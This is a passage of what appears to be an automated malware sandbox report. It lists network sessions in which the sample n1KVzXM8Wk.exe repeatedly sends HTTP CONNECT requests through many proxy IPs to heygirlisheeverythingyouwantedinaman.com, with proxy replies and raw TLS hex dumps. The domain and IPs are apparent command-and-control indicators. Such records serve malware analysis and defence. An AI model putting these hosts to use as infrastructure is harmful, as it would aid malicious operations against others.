                                                                                                      1011192.168.2.45047394.232.11.178464496812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.667334080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.999129057 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1012192.168.2.450506162.144.32.209238476812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.688668966 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.865756989 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.866218090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.881923914 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:47.881371021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:59.881280899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:11.943722963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1013192.168.2.452932151.232.18.6656786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.692089081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1014192.168.2.452670148.72.177.90638536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.692131996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.701097965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.834714890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1015192.168.2.4529348.213.129.1599996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.725049973 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1016192.168.2.452832199.229.254.12941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.725055933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1017192.168.2.451263212.42.116.16156786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.735515118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1018192.168.2.4513595.2.76.163170006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.735814095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.508497953 CET161INHTTP/1.1 503 Too many open connections
                                                                                                      Proxy-Agent: Privoxy 3.0.21
                                                                                                      Content-Type: text/plain
                                                                                                      Connection: close
                                                                                                      Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                                      Data Ascii: Maximum number of open connections reached.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1019192.168.2.450394115.144.163.198209866812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.736176014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.834467888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.834988117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.425519943 CET39INHTTP/1.0 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1020192.168.2.452993172.67.190.934436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.740015030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1021192.168.2.45295031.170.22.12710806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.740212917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1022192.168.2.45293858.234.116.19781976812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.741276979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1023192.168.2.452936210.211.113.34806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.788537025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.159403086 CET194INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:23 GMT
                                                                                                      Proxy-Connection: close
                                                                                                      Via: http/1.1 edgep-06.infra.viettelcdn.com (0.fd8fb8633.el8 [uSc s f p eN:tMc p s ])
                                                                                                      Server: 0.fd8fb8633.el8
                                                                                                      Feb 23, 2024 09:45:24.210074902 CET202OUTData Raw: 16 03 03 00 c5 01 00 00 c1 03 03 65 d8 5b 23 f4 64 aa 05 3b 48 d5 f7 2b d0 bf d2 99 e3 7a e7 85 af 19 6d d6 cd 82 72 29 96 17 5c 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                      Data Ascii: e[#d;H+zmr)\*,+0/$#('=<5/n-+(heygirlisheeverythingyouwantedinaman.com#
                                                                                                      Feb 23, 2024 09:45:24.592202902 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 d8 5b 24 3f a1 70 eb a0 2b fb 9d 5d 4c fe 3a ac 27 0c cf b8 98 45 d7 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 cb 0b 00 10 c7 00
                                                                                                      Data Ascii: C?e[$?p+]L:'EDOWNGRD/#00`4ZmQ0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240212203110Z240512203109Z03110/
                                                                                                      Feb 23, 2024 09:45:24.592221975 CET1286INData Raw: 6d dd 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 1f 8b 40 68 93 64 2a 2d dc 07 bd 7a 5f 46 c4 ea f2 c8 d7 63 e0 4e cc 42 c7 44 46 d1 17 84 d3 1f 08 47 69 c2 b6 7f dd 9d a0 2d 9e 1b be 1f f8 19 ab ad d9 8d 7d 14 62 f3 40 cf 76 94
                                                                                                      Data Ascii: m0*H@hd*-z_FcNBDFGi-}b@v*wTJ;dm55inz74|"@,+v?iS't;H%['rBu*q,/aeYXhV
                                                                                                      Feb 23, 2024 09:45:24.592232943 CET1286INData Raw: 59 02 10 51 5c e3 c0 2b fd b7 06 48 51 7e 09 5e 3f 0f dc a7 fe 97 e7 79 c5 0e 44 89 78 c5 69 59 29 a0 9a 3a 48 36 29 a6 94 93 55 2d b8 47 b5 e9 96 b5 9f 07 cd a6 ab 3e 32 8a c0 86 83 c5 c1 41 c8 9f 2f 35 8e 0d c0 07 7a e1 ac c9 65 b5 cb 8a a7 dd
                                                                                                      Data Ascii: YQ\+HQ~^?yDxiY):H6)U-G>2A/5zeqae92>z6VWAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\
                                                                                                      Feb 23, 2024 09:45:24.592242002 CET832INData Raw: 06 03 55 1d 23 04 18 30 16 80 14 60 7b 66 1a 45 0d 97 ca 89 50 2f 7d 04 cd 34 a8 ff fc fd 4b 30 60 06 08 2b 06 01 05 05 07 01 01 04 54 30 52 30 25 06 08 2b 06 01 05 05 07 30 01 86 19 68 74 74 70 3a 2f 2f 6f 63 73 70 2e 70 6b 69 2e 67 6f 6f 67 2f
                                                                                                      Data Ascii: U#0`{fEP/}4K0`+T0R0%+0http://ocsp.pki.goog/gsr10)+0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0
                                                                                                      Feb 23, 2024 09:45:24.707439899 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 8f 58 58 e6 56 74 1e ef 8f c4 79 c3 5c 7b f2 51 ef cc 1b db 3b d0 1a ba 67 53 09 83 fc 23 89 45 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 1d f4 f2 58 7f 4d f5 cb 09 ca bd d0 bf f1 a7 56 a4 cc 15 86 04
                                                                                                      Data Ascii: %! XXVty\{Q;gS#E(XMV,Q=@P;
                                                                                                      Feb 23, 2024 09:45:25.078300953 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 20 00 c0 3b ec ea 22 b9 7a a8 ed aa b5 49 1a 40 dd fc 8d 36 20 cb 8f af 81 4f 91 c5 81 ba 5b 7a 2c 19 ce b0 b1 91 b5 33 70 85 6e 57 fb fe 6d e5 70 f1 ca 43 59 63 cb f2 65 b1 d1 90 96 3c b7 4f 6e f8 81 83 2c 82
                                                                                                      Data Ascii: ;"zI@6 O[z,3pnWmpCYce<On,1 }0#2lPnSP"<$) ym^59[)7xcX[XlA)JP%J'U!-n%M",)(H?#JXZc;
                                                                                                      Feb 23, 2024 09:45:25.109787941 CET147OUTData Raw: 17 03 03 00 8e 00 00 00 00 00 00 00 01 09 2d 2f f9 1e 61 05 dc 7a b9 60 97 f8 1b f7 51 0e b2 d7 7e 0a 95 94 e5 01 20 eb 9c 71 fa 01 b9 2b f6 d1 0b 9f 7e d2 9d ac a3 1a 54 22 b8 a5 ee 65 49 2b a2 35 b5 af a6 22 b4 44 7e cb 7c 27 00 25 36 2a 85 f6
                                                                                                      Data Ascii: -/az`Q~ q+~T"eI+5"D~|'%6*`xoDi&E0$OFL5-qkI6?#gU^r
                                                                                                      Feb 23, 2024 09:45:25.885550976 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 77 0e 97 99 ab a9 61 2c 21 fd 97 ed bd fe 3c 43 67 f4 7d fd 69 e0 2d 3e 92 cc d4 6b 3c d1 87 07 05 a5 fb 1f 92 64 68 26 ee 39 6c d1 fe 2a 73 7b 5a 44 e6 2e e2 cc c7 b2 0f dd dd 5f 15 e8 0b 42 0a ed 01 63 88
                                                                                                      Data Ascii: qwa,!<Cg}i->k<dh&9l*s{ZD._BcC3l@KSS}^uqd*Q`iRcF}Tk'NJ7J1E&:cM}PYAYfzu)KVL-SDIW&CkUy>/RXM
                                                                                                      Feb 23, 2024 09:45:25.885586977 CET1286INData Raw: b8 5f 40 04 d7 bb 03 88 04 cc 3f 55 55 6f 1d 37 7f c2 dd f9 8b a1 7e 25 7b 47 9d 98 57 54 99 ed 45 f6 08 9d 0c 74 0d 9a fa 37 dd 08 dd e1 3f 4f 54 9a cf 4c d4 6b 0c 8f c9 b7 be 31 60 ac c9 3a bc c8 5d 45 cc c3 a2 3c 0d 51 b2 43 f2 fc 8c 8b c8 a1
                                                                                                      Data Ascii: _@?UUo7~%{GWTEt7?OTLk1`:]E<QCi-9s\8iD9&_"q!77vegMm)XUDh("ece.g&/*h)Kv_9>@@P]$b$O7Y


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1024192.168.2.453004172.67.190.934436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.789378881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1025192.168.2.4529351.15.62.1256786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.790512085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1026192.168.2.452726167.172.159.43489836812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.790666103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.865840912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.866239071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.882149935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1027192.168.2.452971162.253.68.9741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.792802095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1028192.168.2.450466103.105.40.24141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.809214115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1029192.168.2.451340209.13.186.20806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.810111046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.834527969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.835006952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.944160938 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:47.943675041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:59.959283113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:12.051119089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1030192.168.2.45151750.63.12.33230656812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.810148001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.834507942 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.835011959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.944168091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1031192.168.2.452943188.166.197.12931286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.810440063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1032192.168.2.452983213.136.75.85502386812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.810448885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.365680933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.975147963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.178368092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.366024017 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.680572987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.865999937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.368468046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1033192.168.2.45297937.235.48.19806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.810702085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1034192.168.2.45296678.186.18.14236296812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.817374945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1035192.168.2.4529498.213.128.6200026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.817374945 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1036192.168.2.452947119.39.68.7923236812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.817917109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1037192.168.2.451443107.173.154.83499916812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.818850040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1038192.168.2.452969177.12.118.160806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.826596975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.049679041 CET340INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1039192.168.2.452945121.229.101.9610806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.827713013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1040192.168.2.451442161.97.147.193431316812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
